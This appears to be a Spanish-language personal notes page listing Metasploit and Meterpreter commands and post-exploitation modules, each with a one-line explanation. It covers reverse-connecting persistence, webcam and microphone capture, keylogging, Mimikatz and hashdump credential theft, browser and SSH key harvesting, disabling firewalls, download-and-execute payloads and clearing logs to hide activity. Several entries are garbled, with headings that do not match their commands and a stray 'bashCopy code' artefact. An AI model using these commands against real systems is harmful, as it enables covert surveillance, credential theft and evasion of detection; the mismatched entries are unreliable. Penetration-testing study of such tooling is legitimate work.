Page cover

📘METASPLOIT

comandos básicos y formas de uso de Metasploit para que puedas tomar notas:

  1. Iniciar Metasploit:

    msfconsole
    • Explicación: Inicia la consola de Metasploit.

  2. Mostrar módulos disponibles:

    show modules
    • Explicación: Muestra todos los módulos disponibles en Metasploit.

  3. Buscar módulos por nombre o descripción:

    search <keyword>
    • Explicación: Busca módulos que coincidan con el término clave en el nombre o descripción.

  4. Seleccionar un módulo para usar:

    use <module_name>
    • Explicación: Selecciona un módulo específico para utilizarlo.

  5. Mostrar opciones del módulo:

    show options
    • Explicación: Muestra las opciones disponibles para el módulo seleccionado.

  6. Configurar opciones del módulo:

    set <option_name> <value>
    • Explicación: Configura opciones específicas para el módulo seleccionado.

  7. Mostrar payloads disponibles:

    show payloads
    • Explicación: Muestra todos los payloads disponibles para el módulo seleccionado.

  8. Seleccionar un payload:

    set payload <payload_name>
    • Explicación: Selecciona un payload específico para utilizarlo.

  9. Configurar opciones del payload:

    set LHOST <your_IP>
    set LPORT <listening_port>
    • Explicación: Configura opciones específicas para el payload, como la dirección IP del atacante (LHOST) y el puerto de escucha (LPORT).

  10. Ejecutar el exploit:

    exploit
    • Explicación: Ejecuta el exploit con la configuración y el payload especificados.

  11. Mostrar sesiones abiertas:

    sessions
    • Explicación: Muestra las sesiones de Metasploit que están abiertas.

  12. Interactuar con una sesión abierta:

    sessions -i <session_number>
    • Explicación: Interactúa con una sesión abierta utilizando su número de sesión.

  13. Capturar una shell persistente en el sistema objetivo:

    run persistence -U -i 5 -p <listening_port> -r <your_IP>
    • Explicación: Configura una shell persistente para ejecutarse en el sistema objetivo cada 5 minutos y conectarse a la dirección IP del atacante en el puerto especificado.

Algunos comandos adicionales de Metasploit, incluyendo aquellos relacionados con la gestión de la base de datos de Metasploit (MSFDB):

  1. Configurar la base de datos de Metasploit:

    db_status
    • Explicación: Muestra el estado actual de la base de datos de Metasploit.

  2. Iniciar la base de datos de Metasploit:

    db_start
    • Explicación: Inicia la base de datos de Metasploit si no está en ejecución.

  3. Importar hosts escaneados a la base de datos:

    db_import <path/to/scanned_hosts.xml>
    • Explicación: Importa hosts escaneados desde un archivo XML a la base de datos de Metasploit.

  4. Mostrar información sobre hosts en la base de datos:

    hosts
    • Explicación: Muestra información sobre los hosts almacenados en la base de datos.

  5. Mostrar información detallada sobre un host específico:

    hosts -d <host_IP>
    • Explicación: Muestra información detallada sobre un host específico en la base de datos.

  6. Eliminar un host de la base de datos:

    db_nmap -p <port_range> --script vuln <target_IP>
    • Explicación: Escanea un host específico utilizando Nmap con detección de vulnerabilidades y almacena los resultados en la base de datos.

  7. Ejecutar una auditoría de seguridad en hosts almacenados en la base de datos:

    db_autopwn -p -R <host_filter>
    • Explicación: Ejecuta una auditoría de seguridad automática en los hosts almacenados en la base de datos.

  8. Mostrar exploits disponibles en la base de datos:

    services
    • Explicación: Muestra información sobre los servicios detectados y almacenados en la base de datos.

  9. Cargar un exploit desde la base de datos:

    use exploit/multi/handler
    • Explicación: Carga un exploit desde la base de datos para su uso.

  10. Actualizar información sobre exploits desde Internet:

    db_update
    • Explicación: Actualiza la información sobre exploits desde Internet y la almacena en la base de datos.

  11. Buscar exploits en la base de datos:

    search platform:windows type:exploit
    • Explicación: Busca exploits en la base de datos según la plataforma (en este caso, Windows).

  12. Mostrar información sobre un exploit específico:

    info <exploit_path>
    • Explicación: Muestra información detallada sobre un exploit específico.

comandos especiales de Meterpreter y sus explicaciones:

  1. Ejecutar un comando en la máquina objetivo:

    execute -f notepad.exe
    • Explicación: Ejecuta el comando especificado (notepad.exe en este caso) en la máquina objetivo.

  2. Listar procesos en la máquina objetivo:

    ps
    • Explicación: Muestra una lista de procesos en ejecución en la máquina objetivo.

  3. Cambiar de proceso en Meterpreter:

    migrate <process_ID>
    • Explicación: Cambia a otro proceso en la máquina objetivo utilizando su ID de proceso.

  4. Capturar la webcam de la máquina objetivo:

    webcam_snap
    • Explicación: Captura una imagen de la webcam de la máquina objetivo.

  5. Grabar el audio del micrófono de la máquina objetivo:

    record_mic -d 10
    • Explicación: Graba audio desde el micrófono de la máquina objetivo durante 10 segundos.

  6. Capturar la pantalla de la máquina objetivo:

    screenshot
    • Explicación: Captura la pantalla de la máquina objetivo y muestra la imagen.

  7. Obtener información del sistema objetivo:

    sysinfo
    • Explicación: Muestra información detallada sobre el sistema operativo y la configuración de la máquina objetivo.

  8. Enumerar sesiones Meterpreter activas:

    bashCopy codesessions
    • Explicación: Muestra una lista de sesiones Meterpreter activas.

  9. Interactuar con una sesión Meterpreter específica:

    sessions -i <session_ID>
    • Explicación: Permite interactuar con una sesión Meterpreter específica utilizando su ID de sesión.

  10. Cargar un script en Meterpreter:

    load script <script_name>
    • Explicación: Carga un script en Meterpreter para realizar acciones específicas.

  11. Habilitar el servidor VNC en la máquina objetivo:

    run vnc
    • Explicación: Inicia un servidor VNC en la máquina objetivo, permitiendo la conexión a su escritorio.

  12. Exfiltrar archivos de la máquina objetivo a la máquina del atacante:

    download <remote_file> <local_path>
    • Explicación: Descarga un archivo desde la máquina objetivo a la máquina del atacante.

  13. Cargar un módulo adicional en Meterpreter:

    load <module_name>
    • Explicación: Carga un módulo adicional en Meterpreter para ampliar sus capacidades.

  14. Ejecutar comandos del sistema operativo en Meterpreter:

    shell
    • Explicación: Abre una shell interactiva en el contexto del sistema operativo de la máquina objetivo.

  15. Cerrar una sesión Meterpreter:

    sessions -k <session_ID>
    • Explicación: Cierra una sesión Meterpreter específica utilizando su ID de sesión.

comandos especiales de Meterpreter, incluyendo aquellos relacionados con la escalada de privilegios y otras funciones avanzadas:

  1. Capturar pulsaciones de teclas en la máquina objetivo:

    keyscan_start
    • Explicación: Inicia la captura de pulsaciones de teclas en la máquina objetivo.

  2. Detener la captura de pulsaciones de teclas:

    keyscan_dump
    • Explicación: Detiene la captura de pulsaciones de teclas y muestra el resultado.

  3. Enumerar usuarios en la máquina objetivo:

    enum_users
    • Explicación: Enumera los usuarios presentes en la máquina objetivo.

  4. Enumerar redes y compartir recursos en la máquina objetivo:

    net
    • Explicación: Muestra información sobre redes y recursos compartidos en la máquina objetivo.

  5. Ejecutar un script en PowerShell en la máquina objetivo:

    powershell_execute <script>
    • Explicación: Ejecuta un script de PowerShell en la máquina objetivo.

  6. Capturar las credenciales almacenadas en la máquina objetivo:

    mimikatz_command -f sekurlsa::logonpasswords
    • Explicación: Utiliza Mimikatz para capturar las credenciales almacenadas en la máquina objetivo.

  7. Cargar un keylogger en la máquina objetivo:

    run post/windows/capture/keylog_recorder
    • Explicación: Carga un keylogger en la máquina objetivo para registrar pulsaciones de teclas.

  8. Escalar privilegios en la máquina objetivo (Windows)((PROBAR)):

    getsystem
    • Explicación: Intenta escalar privilegios en la máquina objetivo a SYSTEM.

  9. Agregar una excepción al firewall de la máquina objetivo:

    run post/multi/manage/firewall_bypass
    • Explicación: Agrega una excepción al firewall de la máquina objetivo para permitir conexiones entrantes.

  10. Capturar tráfico de red en la máquina objetivo:

    run packetrecorder -li <interface> -o <output_file.pcap>
    • Explicación: Captura el tráfico de red en la máquina objetivo y guarda los resultados en un archivo pcap.

  11. Ejecutar un comando arbitrario en la máquina objetivo:

    execute -f cmd.exe -a "/c <command>"
    • Explicación: Ejecuta un comando arbitrario en la máquina objetivo utilizando cmd.exe.

  12. Habilitar el servidor FTP en la máquina objetivo:

    use auxiliary/server/ftp
    • Explicación: Habilita un servidor FTP en la máquina objetivo para transferencia de archivos.

  13. Modificar la fecha de creación de un archivo en la máquina objetivo:

    timestomp <file_path> -v <date>
    • Explicación: Modifica la fecha de creación de un archivo en la máquina objetivo.

  14. Inyectar un payload en un proceso en ejecución:

    run post/multi/manage/inject
    • Explicación: Inyecta un payload en un proceso en ejecución en la máquina objetivo.

  15. Mostrar información sobre la configuración del sistema objetivo:

    sysinfo
    • Explicación: Muestra información detallada sobre la configuración del sistema objetivo.

    Comandos principales:

    • background: pone en segundo plano la sesión actual

    • exit: Terminar la sesión de Meterpreter

    • guid: Obtenga el GUID (Identificador único global) de la sesión

    • help: muestra el menú de ayuda

    • info: muestra información sobre un módulo de publicación.

    • irb: abre un shell Ruby interactivo en la sesión actual.

    • load: Carga una o más extensiones de Meterpreter

    • migrate: Le permite migrar Meterpreter a otro proceso

    • run: Ejecuta un script de Meterpreter o un módulo de publicación.

    • sessions: cambia rápidamente a otra sesión

    Comandos del sistema de archivos:

    • cd: Cambiará de directorio

    • ls: enumerará los archivos en el directorio actual (el directorio también funcionará)

    • pwd: Imprime el directorio de trabajo actual

    • edit: le permitirá editar un archivo

    • cat: Mostrará el contenido de un archivo en la pantalla.

    • rm: Eliminará el archivo especificado

    • search: Buscará archivos

    • upload: Subirá un archivo o directorio

    • download: Descargará un archivo o directorio

    Comandos de red

    • arp: Muestra la caché ARP (Protocolo de resolución de direcciones) del host

    • ifconfig: Muestra las interfaces de red disponibles en el sistema de destino.

    • netstat: Muestra las conexiones de red.

    • portfwd: reenvía un puerto local a un servicio remoto

    • route: Le permite ver y modificar la tabla de enrutamiento.

    Comandos del sistema:

    • clearev: borra los registros de eventos

    • execute: Ejecuta un comando

    • getpid: Muestra el identificador del proceso actual.

    • getuid: Muestra al usuario que Meterpreter se está ejecutando como

    • kill: Termina un proceso

    • pkill: Termina procesos por nombre

    • ps: enumera los procesos en ejecución

    • reboot: Reinicia la computadora remota

    • shell: cae en un shell de comandos del sistema

    • shutdown: Apaga la computadora remota

    • sysinfo: Obtiene información sobre el sistema remoto, como el sistema operativo.

    Otros comandos (estos se enumerarán en diferentes categorías de menú en el menú de ayuda):

    • idletime: Devuelve el número de segundos que el usuario remoto ha estado inactivo

    • keyscan_dump: Vuelca el búfer de pulsaciones de teclas.

    • keyscan_start: Comienza a capturar pulsaciones de teclas

    • keyscan_stop: Deja de capturar pulsaciones de teclas

    • screenshare: Le permite ver el escritorio del usuario remoto en tiempo real

    • screenshot: toma una captura de pantalla del escritorio interactivo

    • record_mic: Graba audio desde el micrófono predeterminado durante X segundos

    • webcam_chat: inicia un chat de vídeo

    • webcam_list: enumera las cámaras web

    • webcam_snap: toma una instantánea de la cámara web especificada

    • webcam_stream: reproduce una transmisión de video desde la cámara web especificada

    • getsystem: Intenta elevar su privilegio al de sistema local

    • hashdump: Vuelca el contenido de la base de datos SAM

Módulos de Post-Explotación:

  1. Módulo: post/multi/manage/firewall_bypass

    • Ruta: use post/multi/manage/firewall_bypass

    • Descripción: Agrega una excepción al firewall de la máquina objetivo para permitir conexiones entrantes.

    • Uso:

      run post/multi/manage/firewall_bypass
  2. Módulo: post/windows/gather/checkvm

    • Ruta: use post/windows/gather/checkvm

    • Descripción: Verifica si la máquina objetivo se está ejecutando en una máquina virtual.

    • Uso:

      run post/windows/gather/checkvm
  3. Módulo: post/windows/gather/enum_domain_users

    • Ruta: use post/windows/gather/enum_domain_users

    • Descripción: Enumera los usuarios del dominio en la máquina objetivo.

    • Uso:

      run post/windows/gather/enum_domain_users
  4. Módulo: post/windows/gather/enum_shares

    • Ruta: use post/windows/gather/enum_shares

    • Descripción: Enumera los recursos compartidos en la máquina objetivo.

    • Uso:

      run post/windows/gather/enum_shares
  5. Módulo: post/windows/gather/enum_logged_on_users

    • Ruta: use post/windows/gather/enum_logged_on_users

    • Descripción: Enumera los usuarios que han iniciado sesión en la máquina objetivo.

    • Uso:

      run post/windows/gather/enum_logged_on_users
  6. Módulo: post/windows/manage/persistence_exe

    • Ruta: use post/windows/manage/persistence_exe

    • Descripción: Establece persistencia ejecutando un payload cada vez que se inicia la máquina.

    • Uso:

      run post/windows/manage/persistence_exe
  7. Módulo: post/windows/manage/download_exec

    • Ruta: use post/windows/manage/download_exec

    • Descripción: Descarga y ejecuta un archivo en la máquina objetivo.

    • Uso:

      run post/windows/manage/download_exec URL=http://path/to/file.exe
  8. Módulo: post/windows/manage/migrate

    • Ruta: use post/windows/manage/migrate

    • Descripción: Cambia a otro proceso en la máquina objetivo para evadir detección.

    • Uso:

      run post/windows/manage/migrate PROCESS_ID

Estos módulos de post-explotación son esenciales para realizar tareas específicas después de comprometer una máquina y proporcionan funcionalidades avanzadas en Metasploit.

más módulos de post-explotación en Metasploit, cada uno con su descripción y uso:

  1. Módulo: post/windows/gather/enum_patches

    • Ruta: use post/windows/gather/enum_patches

    • Descripción: Enumera los parches instalados en la máquina objetivo.

    • Uso:

      run post/windows/gather/enum_patches
  2. Módulo: post/windows/gather/enum_applications

    • Ruta: use post/windows/gather/enum_applications

    • Descripción: Enumera las aplicaciones instaladas en la máquina objetivo.

    • Uso:

      run post/windows/gather/enum_applications
  3. Módulo: post/windows/gather/enum_wifi

    • Ruta: use post/windows/gather/enum_wifi

    • Descripción: Enumera los perfiles de Wi-Fi almacenados en la máquina objetivo.

    • Uso:

      run post/windows/gather/enum_wifi
  4. Módulo: post/windows/gather/enum_vault

    • Ruta: use post/windows/gather/enum_vault

    • Descripción: Enumera los elementos almacenados en el "Credential Vault" en la máquina objetivo.

    • Uso:

      run post/windows/gather/enum_vault
  5. Módulo: post/windows/gather/enum_services

    • Ruta: use post/windows/gather/enum_services

    • Descripción: Enumera los servicios instalados en la máquina objetivo.

    • Uso:

      run post/windows/gather/enum_services
  6. Módulo: post/windows/gather/enum_logged_sessions

    • Ruta: use post/windows/gather/enum_logged_sessions

    • Descripción: Enumera las sesiones de usuario iniciadas en la máquina objetivo.

    • Uso:

      run post/windows/gather/enum_logged_sessions
  7. Módulo: post/windows/gather/enum_firefox

    • Ruta: use post/windows/gather/enum_firefox

    • Descripción: Enumera las credenciales almacenadas en Firefox en la máquina objetivo.

    • Uso:

      run post/windows/gather/enum_firefox
  8. Módulo: post/windows/gather/enum_chrome

    • Ruta: use post/windows/gather/enum_chrome

    • Descripción: Enumera las credenciales almacenadas en Chrome en la máquina objetivo.

    • Uso:

      run post/windows/gather/enum_chrome
  9. Módulo: post/windows/gather/enum_ie

    • Ruta: use post/windows/gather/enum_ie

    • Descripción: Enumera las credenciales almacenadas en Internet Explorer en la máquina objetivo.

    • Uso:

      run post/windows/gather/enum_ie
  10. Módulo: post/windows/gather/enum_snmp

    • Ruta: use post/windows/gather/enum_snmp

    • Descripción: Enumera información SNMP de la máquina objetivo.

    • Uso:

      run post/windows/gather/enum_snmp
  11. Módulo: post/windows/gather/enum_printer

    • Ruta: use post/windows/gather/enum_printer

    • Descripción: Enumera las impresoras instaladas en la máquina objetivo.

    • Uso:

      run post/windows/gather/enum_printer
  12. Módulo: post/windows/manage/killfw

    • Ruta: use post/windows/manage/killfw

    • Descripción: Detiene y desactiva el firewall de Windows en la máquina objetivo.

    • Uso:

      run post/windows/manage/killfw

Estos módulos ofrecen una amplia variedad de funcionalidades para recopilar información y realizar acciones específicas en la máquina objetivo después de una explotación exitosa.

más módulos de post-explotación específicos para sistemas Linux en Metasploit:

  1. Módulo: post/linux/gather/enum_configs

    • Ruta: use post/linux/gather/enum_configs

    • Descripción: Enumera configuraciones críticas de la máquina Linux objetivo.

    • Uso:

      run post/linux/gather/enum_configs
  2. Módulo: post/linux/gather/enum_sessions

    • Ruta: use post/linux/gather/enum_sessions

    • Descripción: Enumera sesiones de usuarios abiertas en la máquina Linux.

    • Uso:

      run post/linux/gather/enum_sessions
  3. Módulo: post/linux/gather/enum_services

    • Ruta: use post/linux/gather/enum_services

    • Descripción: Enumera los servicios en ejecución en la máquina Linux.

    • Uso:

      run post/linux/gather/enum_services
  4. Módulo: post/linux/gather/enum_applications

    • Ruta: use post/linux/gather/enum_applications

    • Descripción: Enumera las aplicaciones instaladas en la máquina Linux.

    • Uso:

      run post/linux/gather/enum_applications
  5. Módulo: post/linux/gather/enum_logins

    • Ruta: use post/linux/gather/enum_logins

    • Descripción: Enumera información sobre inicios de sesión en la máquina Linux.

    • Uso:

      run post/linux/gather/enum_logins
  6. Módulo: post/linux/gather/enum_network

    • Ruta: use post/linux/gather/enum_network

    • Descripción: Enumera información de red en la máquina Linux.

    • Uso:

      run post/linux/gather/enum_network
  7. Módulo: post/linux/gather/enum_users

    • Ruta: use post/linux/gather/enum_users

    • Descripción: Enumera los usuarios en la máquina Linux.

    • Uso:

      run post/linux/gather/enum_users
  8. Módulo: post/linux/gather/enum_files

    • Ruta: use post/linux/gather/enum_files

    • Descripción: Enumera archivos y directorios críticos en la máquina Linux.

    • Uso:

      run post/linux/gather/enum_files
  9. Módulo: post/linux/gather/enum_configs

    • Ruta: use post/linux/gather/enum_configs

    • Descripción: Enumera configuraciones específicas de la máquina Linux.

    • Uso:

      run post/linux/gather/enum_configs
  10. Módulo: post/linux/manage/clear_logs

    • Ruta: use post/linux/manage/clear_logs

    • Descripción: Borra los registros de logs en la máquina Linux para ocultar actividades.

    • Uso:

      run post/linux/manage/clear_logs

Estos módulos te permitirán realizar diversas acciones y recopilar información en sistemas Linux después de una explotación exitosa.

módulos de Metasploit para la recolección de hashes y credenciales de usuarios en sistemas Windows y Linux:

Para Windows:

  1. Módulo: post/windows/gather/smart_hashdump

    • Ruta: use post/windows/gather/smart_hashdump

    • Descripción: Recopila hashes de contraseñas desde la memoria en sistemas Windows.

    • Uso:

      run post/windows/gather/smart_hashdump
  2. Módulo: post/windows/gather/credentials/gpp

    • Ruta: use post/windows/gather/credentials/gpp

    • Descripción: Enumera credenciales almacenadas en Preferencias de Política de Grupo (GPP) en sistemas Windows.

    • Uso:

      run post/windows/gather/credentials/gpp
  3. Módulo: post/windows/gather/credentials/mimikatz

    • Ruta: use post/windows/gather/credentials/mimikatz

    • Descripción: Utiliza Mimikatz para extraer credenciales almacenadas en sistemas Windows.

    • Uso:

      run post/windows/gather/credentials/mimikatz
  4. Módulo: post/windows/gather/credentials/credential_collector

    • Ruta: use post/windows/gather/credentials/credential_collector

    • Descripción: Recopila credenciales almacenadas en sistemas Windows.

    • Uso:

      run post/windows/gather/credentials/credential_collector

Para Linux:

  1. Módulo: post/linux/gather/enum_ssh

    • Ruta: use post/linux/gather/enum_ssh

    • Descripción: Enumera claves privadas y configuraciones de SSH en sistemas Linux.

    • Uso:

      run post/linux/gather/enum_ssh
  2. Módulo: post/linux/gather/enum_keys

    • Ruta: use post/linux/gather/enum_keys

    • Descripción: Enumera claves privadas y archivos de configuración en sistemas Linux.

    • Uso:

      run post/linux/gather/enum_keys
  3. Módulo: post/linux/gather/enum_passwords

    • Ruta: use post/linux/gather/enum_passwords

    • Descripción: Enumera contraseñas y credenciales almacenadas en sistemas Linux.

    • Uso:

      run post/linux/gather/enum_passwords
  4. Módulo: post/linux/gather/enum_gnome

    • Ruta: use post/linux/gather/enum_gnome

    • Descripción: Enumera credenciales almacenadas en entornos GNOME en sistemas Linux.

    • Uso:

      run post/linux/gather/enum_gnome
  5. Módulo: post/linux/gather/enum_kde_wallet

    • Ruta: use post/linux/gather/enum_kde_wallet

    • Descripción: Enumera credenciales almacenadas en el "KDE Wallet" en sistemas Linux.

    • Uso:

      run post/linux/gather/enum_kde_wallet

Estos módulos te permitirán recolectar hashes y credenciales de usuarios en sistemas Windows y Linux después de una explotación exitosa.

variedad de módulos de Metasploit para sistemas Windows y Linux, incluyendo módulos auxiliares, de escaneo, y más:

Auxiliares:

Para Windows:

  1. Módulo: auxiliary/admin/http/iis_put

  • Ruta: use auxiliary/admin/http/iis_put

  • Descripción: Intenta realizar un ataque PUT en servidores IIS para cargar un archivo.

  • Uso:

    run auxiliary/admin/http/iis_put
  1. Módulo: auxiliary/admin/smb/smb_enumshares

  • Ruta: use auxiliary/admin/smb/smb_enumshares

  • Descripción: Enumera los recursos compartidos en un servidor SMB en sistemas Windows.

  • Uso:

    run auxiliary/admin/smb/smb_enumshares
  1. Módulo: auxiliary/scanner/http/jboss_vulnscan

  • Ruta: use auxiliary/scanner/http/jboss_vulnscan

  • Descripción: Escanea servidores JBoss para vulnerabilidades conocidas.

  • Uso:

    run auxiliary/scanner/http/jboss_vulnscan

Para Linux:

  1. Módulo: auxiliary/scanner/ssh/ssh_enumusers

    • Ruta: use auxiliary/scanner/ssh/ssh_enumusers

    • Descripción: Enumera usuarios a través de SSH en sistemas Linux.

    • Uso:

      run auxiliary/scanner/ssh/ssh_enumusers
  2. Módulo: auxiliary/scanner/mysql/mysql_version

    • Ruta: use auxiliary/scanner/mysql/mysql_version

    • Descripción: Escanea servidores MySQL para obtener la versión.

    • Uso:

      run auxiliary/scanner/mysql/mysql_version
  3. Módulo: auxiliary/scanner/ftp/ftp_version

    • Ruta: use auxiliary/scanner/ftp/ftp_version

    • Descripción: Escanea servidores FTP para obtener la versión.

    • Uso:

      run auxiliary/scanner/ftp/ftp_version

De Escaneo:

Para Windows:

  1. Módulo: scanner/smb/smb_version

    • Ruta: use scanner/smb/smb_version

    • Descripción: Escanea servidores SMB para obtener la versión.

    • Uso:

      run scanner/smb/smb_version
  2. Módulo: scanner/winrm/winrm_version

    • Ruta: use scanner/winrm/winrm_version

    • Descripción: Escanea servidores WinRM para obtener la versión.

    • Uso:

      run scanner/winrm/winrm_version
  3. Módulo: scanner/http/ntlm_info

    • Ruta: use scanner/http/ntlm_info

    • Descripción: Escanea servidores HTTP para obtener información sobre la autenticación NTLM.

    • Uso:

      run scanner/http/ntlm_info

Para Linux:

  1. Módulo: scanner/ssh/ssh_login

    • Ruta: use scanner/ssh/ssh_login

    • Descripción: Escanea servidores SSH para realizar un intento de inicio de sesión.

    • Uso:

      run scanner/ssh/ssh_login
  2. Módulo: scanner/http/wordpress_login_enum

    • Ruta: use scanner/http/wordpress_login_enum

    • Descripción: Escanea sitios WordPress para enumerar usuarios.

    • Uso:

      run scanner/http/wordpress_login_enum
  3. Módulo: scanner/http/joomla_version

    • Ruta: use scanner/http/joomla_version

    • Descripción: Escanea sitios Joomla para obtener la versión.

    • Uso:

      run scanner/http/joomla_version

Estos módulos ofrecen una variedad de funcionalidades, desde explorar versiones de servicios hasta realizar escaneos de vulnerabilidades y enumerar información sobre sistemas.

Last updated